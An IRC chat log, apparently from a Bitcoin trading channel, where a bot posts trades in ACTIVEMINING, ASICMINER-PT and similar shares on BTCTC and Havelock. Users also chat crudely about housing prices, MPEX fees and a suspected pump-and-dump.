Jul 31 04:23:40 [BTCTC] [ACTIVEMINING] 650 @ 0.0064 = 4.16 BTC [-] Jul 31 04:25:00 [BTCTC] [ACTIVEMINING] 700 @ 0.0065 = 4.55 BTC [+] Jul 31 04:25:02 [BTCTC] [ACTIVEMINING] 10 @ 0.00612 = 0.0612 BTC [-] Jul 31 04:25:05 [BTCTC] [ACTIVEMINING] 520 @ 0.00612 = 3.1824 BTC [-] Jul 31 04:25:28 [BTCTC] [ACTIVEMINING] 80 @ 0.006101 = 0.4881 BTC [-] Jul 31 04:25:29 http://bitbet.us/bet/495/there-will-be-blood/ Jul 31 04:25:32 [BTCTC] [ACTIVEMINING] 500 @ 0.0061 = 3.05 BTC [-] Jul 31 04:25:35 [BTCTC] [ACTIVEMINING] 51 @ 0.006021 = 0.3071 BTC [-] Jul 31 04:25:36 BitBet - There will be blood Jul 31 04:25:38 [BTCTC] [ACTIVEMINING] 1350 @ 0.00602 = 8.127 BTC [-] Jul 31 04:25:41 [BTCTC] [ACTIVEMINING] 1300 @ 0.006001 = 7.8013 BTC [-] Jul 31 04:25:46 [BTCTC] [ACTIVEMINING] 5 @ 0.006 = 0.03 BTC [-] Jul 31 04:25:48 [BTCTC] [ACTIVEMINING] 2000 @ 0.006 = 12 BTC [-] Jul 31 04:25:50 [BTCTC] [ACTIVEMINING] 500 @ 0.006 = 3 BTC [-] Jul 31 04:25:52 [BTCTC] [ACTIVEMINING] 153 @ 0.006 = 0.918 BTC [-] Jul 31 04:25:56 [BTCTC] [ACTIVEMINING] 22 @ 0.005905 = 0.1299 BTC [-] Jul 31 04:25:58 [BTCTC] [ACTIVEMINING] 77 @ 0.005902 = 0.4545 BTC [-] Jul 31 04:26:23 [BTCTC] [ACTIVEMINING] 1 @ 0.005902 BTC [-] Jul 31 04:26:44 heh Jul 31 04:28:50 [BTCTC] [COGNITIVE] 1 @ 0.5078 BTC [+] Jul 31 04:28:52 [BTCTC] [ASICMINER-PT] 1 @ 4.317 BTC [+] Jul 31 04:29:22 [BTCTC] [ACTIVEMINING] 25 @ 0.006996 = 0.1749 BTC [+] Jul 31 04:32:14 [BTCTC] [ACTIVEMINING] 25 @ 0.006996 = 0.1749 BTC [+] Jul 31 04:32:30 [BTCTC] [BFMINES] 35 @ 0.004 = 0.14 BTC [+] Jul 31 04:33:07 [BTCTC] [ACTIVEMINING] 17 @ 0.006994 = 0.1189 BTC [-] Jul 31 04:33:20 [BTCTC] [ACTIVEMINING] 25 @ 0.006993 = 0.1748 BTC [-] Jul 31 04:39:25 "At the same time, surveys by RBC and the Canadian Association of Accredited Mortgage Professionals (CAAMP) have consistently shown that people view home ownership as the best way to build long-term wealth. Home ownership is consistently rated higher than investing in stocks, bonds, or mutual funds as the best way to build wealth." Jul 31 04:39:37 Say WHUT!? Jul 31 04:40:13 their data is old Jul 31 04:40:17 from back in the bubble. Jul 31 04:40:24 they would like the bubble to be back, so... Jul 31 04:40:56 No, the article dates 2012 and says it's retarded behavior. Jul 31 04:41:16 do they ave cap gains tax in canukistan? Jul 31 04:41:32 Yes Jul 31 04:42:09 Namworld i meant the mortgage professionals. Jul 31 04:42:16 they jobs kinda depend on people likingmoprtgages. Jul 31 04:42:39 sort of like a pizzeria will say "people" love pizza. totally more than cock persay. Jul 31 04:43:04 But I'm pretty sure their surveys would still be accurate today. Jul 31 04:43:07 I bet moosecocks are te second preference Jul 31 04:43:37 kinda like climate change, people need to be able to taste something to know its real Jul 31 04:43:59 Housing prices haven't corrected here yet and still growing. Jul 31 04:44:18 [BTCTC] [ACTIVEMINING] 25 @ 0.006201 = 0.155 BTC [-] Jul 31 04:44:20 [BTCTC] [ACTIVEMINING] 450 @ 0.0062 = 2.79 BTC [-] Jul 31 04:44:24 try housing prices in australia, it's insane but keeps going Jul 31 04:44:27 [BTCTC] [ACTIVEMINING] 25 @ 0.007248 = 0.1812 BTC [+] Jul 31 04:44:29 [BTCTC] [ACTIVEMINING] 50 @ 0.007249 = 0.3625 BTC [+] Jul 31 04:44:31 [BTCTC] [ACTIVEMINING] 15 @ 0.007249 = 0.1087 BTC [+] Jul 31 04:44:32 when they lick the wallpaper in the bathroom it has a reasuring saltiness Jul 31 04:45:35 lol dub Jul 31 04:46:49 _what the fuck_ Jul 31 04:47:45 [BTCTC] [ACTIVEMINING] 25 @ 0.006859 = 0.1715 BTC [-] Jul 31 04:48:18 [BTCTC] [ACTIVEMINING] 25 @ 0.006303 = 0.1576 BTC [-] Jul 31 04:48:20 [BTCTC] [ACTIVEMINING] 15 @ 0.006302 = 0.0945 BTC [-] Jul 31 04:48:22 [BTCTC] [ACTIVEMINING] 500 @ 0.0063 = 3.15 BTC [-] Jul 31 04:48:48 [BTCTC] [ACTIVEMINING] 25 @ 0.006857 = 0.1714 BTC [+] Jul 31 04:49:18 [BTCTC] [ACTIVEMINING] 1 @ 0.006849 BTC [-] Jul 31 04:51:36 Should such a correction occur. Jul 31 04:52:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006351 = 0.1588 BTC [-] Jul 31 04:53:00 pretty much my thoughts exactly. Jul 31 04:53:20 and im spending enough in rents a month to buy an apartment here. Jul 31 04:55:06 [BTCTC] [ACTIVEMINING] 25 @ 0.006353 = 0.1588 BTC [+] Jul 31 04:55:18 [BTCTC] [ACTIVEMINING] 48 @ 0.006352 = 0.3049 BTC [-] Jul 31 04:55:22 [BTCTC] [ACTIVEMINING] 600 @ 0.00635 = 3.81 BTC [-] Jul 31 04:55:25 [BTCTC] [ACTIVEMINING] 1 @ 0.006203 BTC [-] Jul 31 04:55:28 [BTCTC] [ACTIVEMINING] 500 @ 0.006202 = 3.101 BTC [-] Jul 31 04:55:32 [BTCTC] [ACTIVEMINING] 100 @ 0.0061 = 0.61 BTC [-] Jul 31 04:55:55 [BTCTC] [ACTIVEMINING] 522 @ 0.006 = 3.132 BTC [-] Jul 31 04:56:23 [BTCTC] [ACTIVEMINING] 500 @ 0.006 = 3 BTC [-] Jul 31 04:56:25 [BTCTC] [ACTIVEMINING] 97 @ 0.006 = 0.582 BTC [-] Jul 31 04:56:27 [BTCTC] [ACTIVEMINING] 280 @ 0.006 = 1.68 BTC [-] Jul 31 04:56:29 [BTCTC] [ACTIVEMINING] 295 @ 0.006 = 1.77 BTC [-] Jul 31 04:56:31 [BTCTC] [ACTIVEMINING] 2595 @ 0.00595 = 15.4403 BTC [-] Jul 31 04:56:33 [BTCTC] [ACTIVEMINING] 18 @ 0.005904 = 0.1063 BTC [-] Jul 31 04:56:35 [BTCTC] [ACTIVEMINING] 500 @ 0.005903 = 2.9515 BTC [-] Jul 31 04:56:38 [BTCTC] [ACTIVEMINING] 10 @ 0.0059 = 0.059 BTC [-] Jul 31 04:56:40 [BTCTC] [ACTIVEMINING] 77 @ 0.005882 = 0.4529 BTC [-] Jul 31 04:56:42 [BTCTC] [ACTIVEMINING] 225 @ 0.005803 = 1.3057 BTC [-] Jul 31 04:56:44 [BTCTC] [ACTIVEMINING] 409 @ 0.0058 = 2.3722 BTC [-] Jul 31 04:56:45 [BTCTC] [ACTIVEMINING] 1000 @ 0.0057 = 5.7 BTC [-] Jul 31 04:56:48 [BTCTC] [ACTIVEMINING] 20 @ 0.005605 = 0.1121 BTC [-] Jul 31 04:56:51 [BTCTC] [ACTIVEMINING] 1000 @ 0.005605 = 5.605 BTC [-] Jul 31 04:56:54 [BTCTC] [ACTIVEMINING] 898 @ 0.005545 = 4.9794 BTC [-] Jul 31 04:57:05 [BTCTC] [ACTIVEMINING] 1000 @ 0.005545 = 5.545 BTC [-] Jul 31 04:57:08 [BTCTC] [ACTIVEMINING] 4000 @ 0.005544 = 22.176 BTC [-] Jul 31 04:57:19 [BTCTC] [ACTIVEMINING] 90 @ 0.0055 = 0.495 BTC [-] Jul 31 04:57:22 [BTCTC] [ACTIVEMINING] 100 @ 0.0055 = 0.55 BTC [-] Jul 31 04:57:24 [BTCTC] [ACTIVEMINING] 500 @ 0.0055 = 2.75 BTC [-] Jul 31 04:57:26 [BTCTC] [ACTIVEMINING] 1 @ 0.005487 BTC [-] Jul 31 04:57:28 [BTCTC] [ACTIVEMINING] 1000 @ 0.00533 = 5.33 BTC [-] Jul 31 04:57:29 [BTCTC] [ACTIVEMINING] 680 @ 0.0053 = 3.604 BTC [-] Jul 31 04:57:31 [BTCTC] [ACTIVEMINING] 1 @ 0.00525 BTC [-] Jul 31 04:57:33 [BTCTC] [ACTIVEMINING] 1000 @ 0.005226 = 5.226 BTC [-] Jul 31 04:57:35 [BTCTC] [ACTIVEMINING] 1 @ 0.005201 BTC [-] Jul 31 04:57:37 [BTCTC] [ACTIVEMINING] 1500 @ 0.0052 = 7.8 BTC [-] Jul 31 04:57:39 [BTCTC] [ACTIVEMINING] 1000 @ 0.005126 = 5.126 BTC [-] Jul 31 04:57:41 [BTCTC] [ACTIVEMINING] 90 @ 0.005001 = 0.4501 BTC [-] Jul 31 04:57:43 [BTCTC] [ACTIVEMINING] 2 @ 0.005 = 0.01 BTC [-] Jul 31 04:57:45 [BTCTC] [ACTIVEMINING] 2000 @ 0.005 = 10 BTC [-] Jul 31 04:57:46 [BTCTC] [ACTIVEMINING] 500 @ 0.005 = 2.5 BTC [-] Jul 31 04:57:47 [BTCTC] [ACTIVEMINING] 100 @ 0.005 = 0.5 BTC [-] Jul 31 04:57:49 Hello, correction Jul 31 04:57:50 [BTCTC] [ACTIVEMINING] 35 @ 0.005 = 0.175 BTC [-] Jul 31 04:57:52 [BTCTC] [ACTIVEMINING] 9695 @ 0.005 = 48.475 BTC [-] Jul 31 04:58:29 [BTCTC] [ACTIVEMINING] 25 @ 0.006002 = 0.1501 BTC [+] Jul 31 04:58:52 [BTCTC] [ACTIVEMINING] 105 @ 0.006001 = 0.6301 BTC [-] Jul 31 04:58:54 [BTCTC] [ACTIVEMINING] 25 @ 0.006696 = 0.1674 BTC [+] Jul 31 04:58:56 [BTCTC] [ACTIVEMINING] 742 @ 0.006697 = 4.9692 BTC [+] Jul 31 04:59:02 awww Jul 31 04:59:33 [BTCTC] [ACTIVEMINING] 25 @ 0.006 = 0.15 BTC [-] Jul 31 04:59:35 [BTCTC] [ACTIVEMINING] 25 @ 0.00536 = 0.134 BTC [-] Jul 31 04:59:37 [BTCTC] [ACTIVEMINING] 1 @ 0.005359 BTC [-] Jul 31 04:59:39 [BTCTC] [ACTIVEMINING] 965 @ 0.005002 = 4.8269 BTC [-] Jul 31 04:59:40 [BTCTC] [ACTIVEMINING] 157 @ 0.005002 = 0.7853 BTC [-] Jul 31 04:59:40 hello all Jul 31 04:59:41 [BTCTC] [ACTIVEMINING] 1000 @ 0.005001 = 5.001 BTC [-] Jul 31 04:59:43 [BTCTC] [ACTIVEMINING] 295 @ 0.005 = 1.475 BTC [-] Jul 31 04:59:45 [BTCTC] [ACTIVEMINING] 2804 @ 0.005 = 14.02 BTC [-] Jul 31 04:59:57 hi. Jul 31 05:00:25 [BTCTC] [ACTIVEMINING] 50 @ 0.006396 = 0.3198 BTC [+] Jul 31 05:00:41 [BTCTC] [ACTIVEMINING] 25 @ 0.005001 = 0.125 BTC [-] Jul 31 05:00:44 [BTCTC] [ACTIVEMINING] 989 @ 0.005 = 4.945 BTC [-] Jul 31 05:00:47 [BTCTC] [ACTIVEMINING] 300 @ 0.0048 = 1.44 BTC [-] Jul 31 05:00:51 [BTCTC] [ACTIVEMINING] 910 @ 0.0047 = 4.277 BTC [-] Jul 31 05:00:53 [BTCTC] [ACTIVEMINING] 2 @ 0.0047 = 0.0094 BTC [-] Jul 31 05:00:54 [BTCTC] [ACTIVEMINING] 1000 @ 0.004533 = 4.533 BTC [-] Jul 31 05:00:57 [BTCTC] [ACTIVEMINING] 250 @ 0.0045 = 1.125 BTC [-] Jul 31 05:00:59 [BTCTC] [ACTIVEMINING] 1500 @ 0.0043 = 6.45 BTC [-] Jul 31 05:00:59 MPEX and GLBSE, same shit different name? Jul 31 05:01:05 [BTCTC] [ACTIVEMINING] 20 @ 0.0042 = 0.084 BTC [-] Jul 31 05:01:24 GLBSE doesn't exist anymore. Jul 31 05:01:24 [BTCTC] [ACTIVEMINING] 1 @ 0.0042 BTC [-] Jul 31 05:01:25 [BTCTC] [ACTIVEMINING] 100 @ 0.004018 = 0.4018 BTC [-] Jul 31 05:01:28 [BTCTC] [ACTIVEMINING] 500 @ 0.00401 = 2.005 BTC [-] Jul 31 05:01:30 [BTCTC] [ACTIVEMINING] 30 @ 0.003903 = 0.1171 BTC [-] Jul 31 05:01:32 [BTCTC] [ACTIVEMINING] 35 @ 0.003801 = 0.133 BTC [-] Jul 31 05:01:34 [BTCTC] [ACTIVEMINING] 1 @ 0.0038 BTC [-] Jul 31 05:01:37 GLBSE had CSS. Jul 31 05:01:40 and not really the same thing Jul 31 05:01:42 [BTCTC] [ACTIVEMINING] 3000 @ 0.0038 = 11.4 BTC [-] Jul 31 05:02:48 [BTCTC] [ACTIVEMINING] 14000 @ 0.0038 = 53.2 BTC [-] Jul 31 05:03:06 [BTCTC] [ACTIVEMINING] 1000 @ 0.0038 = 3.8 BTC [-] Jul 31 05:03:19 inb4 tibsy Jul 31 05:03:37 dannnnnnn no. exactly opposite. Jul 31 05:03:48 [BTCTC] [ACTIVEMINING] 25 @ 0.005399 = 0.135 BTC [+] Jul 31 05:03:50 [BTCTC] [ACTIVEMINING] 275 @ 0.0054 = 1.485 BTC [+] Jul 31 05:04:06 Is CoinBr worth it? how much is the MPEX new account fee nowadays? Jul 31 05:04:30 same as when glbse croaked. 30 btc. Jul 31 05:04:47 [BTCTC] [ASICMINER-PT] 1 @ 4.376 BTC [+] Jul 31 05:04:49 [BTCTC] [ASICMINER-PT] 1 @ 4.377 BTC [+] Jul 31 05:04:51 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 31 05:04:53 [BTCTC] [ASICMINER-PT] 1 @ 4.382 BTC [+] Jul 31 05:04:55 [BTCTC] [ASICMINER-PT] 2 @ 4.383 = 8.766 BTC [+] Jul 31 05:04:57 [BTCTC] [ASICMINER-PT] 1 @ 4.387 BTC [+] Jul 31 05:05:05 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 31 05:05:13 somebody pump-and-dumped on activeminer? Jul 31 05:05:35 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 31 05:05:41 [BTCTC] [BASIC-MINING] 1 @ 0.4525 BTC [-] Jul 31 05:05:51 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 31 05:05:53 [BTCTC] [ASICMINER-PT] 5 @ 4.283 = 21.415 BTC [-] Jul 31 05:05:56 [BTCTC] [ASICMINER-PT] 2 @ 4.281 = 8.562 BTC [-] Jul 31 05:06:00 yes. the operator. Jul 31 05:06:19 glad I didn't buy that shit Jul 31 05:06:37 someone payed $5k usd to ken to transfer 120k bitfunder shared to btctc Jul 31 05:06:39 Man I thought I watched over AMC like a hawk, go to the gym for just a bit and miss a easy cheap buy Jul 31 05:06:42 probably them Jul 31 05:06:48 [BTCTC] [ACTIVEMINING] 600 @ 0.005378 = 3.2268 BTC [-] Jul 31 05:06:56 damn Jul 31 05:07:23 mircea_popescu: new account fee on mpex is 30btc? Jul 31 05:07:27 yes. Jul 31 05:07:31 cool, thanks Jul 31 05:07:47 [BTCTC] [ACTIVEMINING] 1000 @ 0.0044 = 4.4 BTC [-] Jul 31 05:08:36 [BTCTC] [ACTIVEMINING] 500 @ 0.0048 = 2.4 BTC [+] Jul 31 05:09:03 Talk about price security. Instant massive price drop. Jul 31 05:09:47 [BTCTC] [ACTIVEMINING] 1 @ 0.005197 BTC [+] Jul 31 05:10:20 30btc? sign me up for 5 Jul 31 05:10:21 [BTCTC] [ACTIVEMINING] 8 @ 0.005196 = 0.0416 BTC [-] Jul 31 05:10:45 [BTCTC] [ACTIVEMINING] 25 @ 0.005195 = 0.1299 BTC [-] Jul 31 05:10:46 [BTCTC] [ASICMINER-PT] 1 @ 4.287 BTC [+] Jul 31 05:11:04 [BTCTC] [ACTIVEMINING] 25 @ 0.005194 = 0.1299 BTC [-] Jul 31 05:11:16 [BTCTC] [ACTIVEMINING] 314 @ 0.005195 = 1.6312 BTC [+] Jul 31 05:11:19 [BTCTC] [ACTIVEMINING] 25 @ 0.005195 = 0.1299 BTC [+] Jul 31 05:11:30 well when your price is primarily influenced by rainbows and down syndrome... Jul 31 05:11:46 [BTCTC] [ACTIVEMINING] 25 @ 0.005192 = 0.1298 BTC [-] Jul 31 05:11:48 [BTCTC] [ACTIVEMINING] 25 @ 0.005193 = 0.1298 BTC [+] Jul 31 05:12:03 [BTCTC] [ACTIVEMINING] 341 @ 0.005198 = 1.7725 BTC [+] Jul 31 05:12:54 Everyone was saying how they were up 1000% ROI. Just like people when they were at 266 USD/BTC. All saying it was good investment. Jul 31 05:13:09 [BTCTC] [ACTIVEMINING] 1 @ 0.00525 BTC [+] Jul 31 05:13:11 [BTCTC] [ACTIVEMINING] 333 @ 0.005379 = 1.7912 BTC [+] Jul 31 05:13:19 But oh look, not everyone can actually get out that 1000% ROI value. Jul 31 05:13:21 [BTCTC] [ACTIVEMINING] 12 @ 0.005397 = 0.0648 BTC [+] Jul 31 05:13:23 [BTCTC] [ACTIVEMINING] 25 @ 0.0054 = 0.135 BTC [+] Jul 31 05:13:24 looking forward to the activeminer sec proceedings. Jul 31 05:13:25 [BTCTC] [ACTIVEMINING] 138 @ 0.005799 = 0.8003 BTC [+] Jul 31 05:13:39 maybe in a decade or two they actually get the jerkwads doing it. Jul 31 05:13:50 [BTCTC] [ACTIVEMINING] 100 @ 0.005799 = 0.5799 BTC [+] Jul 31 05:14:38 [BTCTC] [ACTIVEMINING] 234 @ 0.005799 = 1.357 BTC [+] Jul 31 05:14:58 [BTCTC] [ACTIVEMINING] 4 @ 0.005799 = 0.0232 BTC [+] Jul 31 05:15:23 [BTCTC] [ACTIVEMINING] 80 @ 0.0058 = 0.464 BTC [+] Jul 31 05:15:53 [BTCTC] [ACTIVEMINING] 25 @ 0.005799 = 0.145 BTC [-] Jul 31 05:15:55 [BTCTC] [ACTIVEMINING] 259 @ 0.0058 = 1.5022 BTC [+] Jul 31 05:16:31 [BTCTC] [ACTIVEMINING] 25 @ 0.0058 = 0.145 BTC [+] Jul 31 05:16:33 [BTCTC] [ACTIVEMINING] 1500 @ 0.00599 = 8.985 BTC [+] Jul 31 05:16:35 [HAVELOCK] [AM100] 2 @ 0.0397 = 0.0794 BTC [-] Jul 31 05:16:37 [HAVELOCK] [AM100] 1 @ 0.03951 BTC [-] Jul 31 05:16:40 [HAVELOCK] [AM100] 25 @ 0.03950001 = 0.9875 BTC [-] Jul 31 05:16:42 [HAVELOCK] [AM100] 325 @ 0.0395 = 12.8375 BTC [-] Jul 31 05:16:44 [HAVELOCK] [AM100] 1 @ 0.0393 BTC [-] Jul 31 05:16:46 [HAVELOCK] [AM100] 1 @ 0.0391 BTC [-] Jul 31 05:16:47 [HAVELOCK] [AM100] 40 @ 0.0391 = 1.564 BTC [-] Jul 31 05:16:49 [HAVELOCK] [AM100] 80 @ 0.0391 = 3.128 BTC [-] Jul 31 05:16:51 [HAVELOCK] [AM100] 100 @ 0.03900001 = 3.9 BTC [-] Jul 31 05:17:06 [HAVELOCK] [AM100] 1 @ 0.0389 BTC [-] Jul 31 05:17:09 [HAVELOCK] [AM100] 1 @ 0.0387 BTC [-] Jul 31 05:17:11 [HAVELOCK] [AM100] 1 @ 0.0385 BTC [-] Jul 31 05:17:13 [HAVELOCK] [AM100] 1 @ 0.0383 BTC [-] Jul 31 05:17:15 [HAVELOCK] [AM100] 1 @ 0.0383 BTC [-] Jul 31 05:17:17 [HAVELOCK] [AM100] 1 @ 0.0381 BTC [-] Jul 31 05:17:20 [BTCTC] [ACTIVEMINING] 25 @ 0.005799 = 0.145 BTC [-] Jul 31 05:17:20 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.002631 = 0.1316 BTC [-] Jul 31 05:17:31 [BTCTC] [ACTIVEMINING] 25 @ 0.005798 = 0.145 BTC [-] Jul 31 05:17:51 [BTCTC] [ACTIVEMINING] 100 @ 0.00599 = 0.599 BTC [+] Jul 31 05:18:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005999 = 0.3 BTC [+] Jul 31 05:18:07 [BTCTC] [ACTIVEMINING] 650 @ 0.006 = 3.9 BTC [+] Jul 31 05:18:28 [BTCTC] [DMS.MINING] 7 @ 0.008989 = 0.0629 BTC [-] Jul 31 05:18:29 [BTCTC] [DMS.SELLING] 10 @ 0.0212 = 0.212 BTC [-] Jul 31 05:18:33 [BTCTC] [DMS.MINING] 26 @ 0.008989 = 0.2337 BTC [-] Jul 31 05:18:35 [BTCTC] [ACTIVEMINING] 6350 @ 0.006 = 38.1 BTC [+] Jul 31 05:18:48 [BTCTC] [ACTIVEMINING] 50 @ 0.005999 = 0.3 BTC [-] Jul 31 05:18:54 [BTCTC] [ACTIVEMINING] 950 @ 0.0057 = 5.415 BTC [-] Jul 31 05:18:55 [BTCTC] [ACTIVEMINING] 50 @ 0.005999 = 0.3 BTC [+] Jul 31 05:19:27 [BTCTC] [ACTIVEMINING] 1 @ 0.00639 BTC [+] Jul 31 05:19:38 [BTCTC] [ACTIVEMINING] 99 @ 0.00639 = 0.6326 BTC [+] Jul 31 05:19:40 [BTCTC] [ACTIVEMINING] 1451 @ 0.0065 = 9.4315 BTC [+] Jul 31 05:21:07 [BTCTC] [ACTIVEMINING] 3 @ 0.0065 = 0.0195 BTC [+] Jul 31 05:21:21 [BTCTC] [ACTIVEMINING] 4500 @ 0.0065 = 29.25 BTC [+] Jul 31 05:21:46 [BTCTC] [ACTIVEMINING] 1000 @ 0.0065 = 6.5 BTC [+] Jul 31 05:22:02 [BTCTC] [ACTIVEMINING] 46 @ 0.0065 = 0.299 BTC [+] Jul 31 05:26:41 [BTCTC] [ACTIVEMINING] 1100 @ 0.006 = 6.6 BTC [-] Jul 31 05:26:53 I guess his mom didnt steal the latest script for ritalin Jul 31 05:27:02 [BTCTC] [ACTIVEMINING] 25 @ 0.005753 = 0.1438 BTC [-] Jul 31 05:27:04 [BTCTC] [ACTIVEMINING] 50 @ 0.005752 = 0.2876 BTC [-] Jul 31 05:27:06 [BTCTC] [ACTIVEMINING] 297 @ 0.005751 = 1.708 BTC [-] Jul 31 05:27:08 [BTCTC] [ACTIVEMINING] 308 @ 0.005751 = 1.7713 BTC [-] Jul 31 05:27:39 [BTCTC] [ACTIVEMINING] 25 @ 0.005999 = 0.15 BTC [+] Jul 31 05:28:56 [BTCTC] [ACTIVEMINING] 25 @ 0.005751 = 0.1438 BTC [-] Jul 31 05:29:00 [BTCTC] [ACTIVEMINING] 100 @ 0.005751 = 0.5751 BTC [-] Jul 31 05:29:10 [BTCTC] [ACTIVEMINING] 46 @ 0.005751 = 0.2645 BTC [-] Jul 31 05:29:37 [HAVELOCK] [AM100] 2 @ 0.0413 = 0.0826 BTC [+] Jul 31 05:29:54 [BTCTC] [ACTIVEMINING] 25 @ 0.005751 = 0.1438 BTC [-] Jul 31 05:29:56 [BTCTC] [ACTIVEMINING] 702 @ 0.00575 = 4.0365 BTC [-] Jul 31 05:30:27 [BTCTC] [ACTIVEMINING] 25 @ 0.005751 = 0.1438 BTC [+] Jul 31 05:30:31 [BTCTC] [ACTIVEMINING] 298 @ 0.00575 = 1.7135 BTC [-] Jul 31 05:30:38 http://xcfd.com/en/ these guys have CSS Jul 31 05:37:52 fucking parallax effect Jul 31 05:37:59 [BTCTC] [ASICMINER-PT] 1 @ 4.291 BTC [+] Jul 31 05:38:02 [BTCTC] [ASICMINER-PT] 1 @ 4.29 BTC [-] Jul 31 05:38:04 [BTCTC] [ASICMINER-PT] 2 @ 4.288 = 8.576 BTC [-] Jul 31 05:38:17 [BTCTC] [ASICMINER-PT] 1 @ 4.288 BTC [-] Jul 31 05:38:28 [BTCTC] [ASICMINER-PT] 1 @ 4.285 BTC [-] Jul 31 05:38:30 [BTCTC] [ASICMINER-PT] 3 @ 4.281 = 12.843 BTC [-] Jul 31 05:40:37 [BTCTC] [ACTIVEMINING] 50 @ 0.005998 = 0.2999 BTC [+] Jul 31 05:40:39 [BTCTC] [ACTIVEMINING] 32 @ 0.005999 = 0.192 BTC [+] Jul 31 05:41:17 [BTCTC] [ACTIVEMINING] 1 @ 0.005998 BTC [-] Jul 31 05:41:18 [BTCTC] [DMS.MINING] 1 @ 0.008989 BTC [-] Jul 31 05:41:27 [BTCTC] [ACTIVEMINING] 25 @ 0.005997 = 0.1499 BTC [-] Jul 31 05:41:29 [BTCTC] [ACTIVEMINING] 68 @ 0.005999 = 0.4079 BTC [+] Jul 31 05:41:30 [BTCTC] [ACTIVEMINING] 7 @ 0.006 = 0.042 BTC [+] Jul 31 05:41:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005999 = 0.15 BTC [-] Jul 31 05:41:54 [BTCTC] [ACTIVEMINING] 15 @ 0.006 = 0.09 BTC [+] Jul 31 05:41:58 [BTCTC] [ACTIVEMINING] 500 @ 0.006 = 3 BTC [+] Jul 31 05:42:54 [BTCTC] [ACTIVEMINING] 25 @ 0.005999 = 0.15 BTC [-] Jul 31 05:42:58 [BTCTC] [ACTIVEMINING] 465 @ 0.005999 = 2.7895 BTC [-] Jul 31 05:43:24 Activemining plunging again eh Jul 31 05:43:58 [BTCTC] [ACTIVEMINING] 8 @ 0.005999 = 0.048 BTC [-] Jul 31 05:44:11 [HAVELOCK] [AM100] 1 @ 0.0414 BTC [+] Jul 31 05:44:27 [BTCTC] [ACTIVEMINING] 12 @ 0.005999 = 0.072 BTC [-] Jul 31 05:44:30 [BTCTC] [ACTIVEMINING] 90 @ 0.005999 = 0.5399 BTC [-] Jul 31 05:44:36 [MPEX] [S.MPOE] 2100 @ 0.00080547 = 1.6915 BTC [-] Jul 31 05:44:46 [BTCTC] [ACTIVEMINING] 102 @ 0.005999 = 0.6119 BTC [-] Jul 31 05:44:48 [BTCTC] [ACTIVEMINING] 6398 @ 0.006 = 38.388 BTC [+] Jul 31 05:45:33 [BTCTC] [ACTIVEMINING] 600 @ 0.006 = 3.6 BTC [+] Jul 31 05:45:37 [BTCTC] [ACTIVEMINING] 25 @ 0.005901 = 0.1475 BTC [-] Jul 31 05:45:40 [BTCTC] [ACTIVEMINING] 725 @ 0.0059 = 4.2775 BTC [-] Jul 31 05:45:51 [BTCTC] [ACTIVEMINING] 25 @ 0.005999 = 0.15 BTC [+] Jul 31 05:45:54 [BTCTC] [ACTIVEMINING] 9975 @ 0.006 = 59.85 BTC [+] Jul 31 05:45:59 [BTCTC] [ASICMINER-PT] 1 @ 4.262 BTC [-] Jul 31 05:45:59 anyone want some butt hurt on basic financial terms check out - http://www.reddit.com/r/Bitcoin/comments/1jcj3y/psa_butterfly_labs_return_of_interest/ Jul 31 05:46:34 lol Jul 31 05:46:36 reddit. Jul 31 05:47:18 [BTCTC] [ACTIVEMINING] 500 @ 0.006 = 3 BTC [+] Jul 31 05:47:31 [BTCTC] [ACTIVEMINING] 25 @ 0.00591 = 0.1478 BTC [-] Jul 31 05:47:33 [BTCTC] [DMS.MINING] 3 @ 0.008403 = 0.0252 BTC [-] Jul 31 05:47:34 [BTCTC] [ACTIVEMINING] 125 @ 0.005909 = 0.7386 BTC [-] Jul 31 05:47:40 [BTCTC] [ACTIVEMINING] 1 @ 0.0075 BTC [+] Jul 31 05:47:48 [BTCTC] [ACTIVEMINING] 25 @ 0.005999 = 0.15 BTC [-] Jul 31 05:48:24 [BTCTC] [ACTIVEMINING] 500 @ 0.0083 = 4.15 BTC [+] Jul 31 05:48:32 idk, reddit versus btctalk.... i would have thought the bitcoin sub would have won Jul 31 05:48:44 [BTCTC] [DMS.SELLING] 1 @ 0.02219 BTC [+] Jul 31 05:49:14 i now fear for my children Jul 31 05:49:25 [HAVELOCK] [AM100] 1 @ 0.0413 BTC [-] Jul 31 05:52:33 [BTCTC] [ACTIVEMINING] 25 @ 0.006007 = 0.1502 BTC [-] Jul 31 05:52:35 [BTCTC] [ACTIVEMINING] 42 @ 0.006006 = 0.2523 BTC [-] Jul 31 05:52:37 [BTCTC] [ACTIVEMINING] 314 @ 0.006006 = 1.8859 BTC [-] Jul 31 05:52:39 [BTCTC] [ACTIVEMINING] 119 @ 0.006005 = 0.7146 BTC [-] Jul 31 05:52:44 its like the forum, only they are months behind and get all the memes wrong Jul 31 05:52:53 [.]edmanet 6 points 10 hours ago Jul 31 05:52:53 No worries. Everything will be shipped in "two months or more". Jul 31 05:53:01 doing it wrong Jul 31 05:53:20 [BTCTC] [ACTIVEMINING] 25 @ 0.006201 = 0.155 BTC [+] Jul 31 05:53:37 [BTCTC] [ACTIVEMINING] 10 @ 0.00665 = 0.0665 BTC [+] Jul 31 05:53:56 i keep waiting for the funny memes... i guess bitcoiners just aren't funny Jul 31 05:55:08 They've got sardonic nailed, just not funny Jul 31 05:55:18 optimator, they are a living meme. No need for funny pictures. Just watch and read. Jul 31 05:56:03 ha! better than any drama series i agree! Jul 31 05:57:54 [HAVELOCK] [AM100] 1 @ 0.0414 BTC [+] Jul 31 05:58:22 [HAVELOCK] [AM100] 1 @ 0.0415 BTC [+] Jul 31 05:59:22 <[\\\]> return of interest? Jul 31 05:59:39 <[\\\]> its return on investment Jul 31 06:00:29 no, your wrong Jul 31 06:00:34 [BTCTC] [ACTIVEMINING] 25 @ 0.006499 = 0.1625 BTC [-] Jul 31 06:00:41 [BTCTC] [ACTIVEMINING] 25 @ 0.006499 = 0.1625 BTC [-] Jul 31 06:00:47 [BTCTC] [ACTIVEMINING] 350 @ 0.0065 = 2.275 BTC [+] Jul 31 06:00:49 [BTCTC] [ACTIVEMINING] 50 @ 0.006519 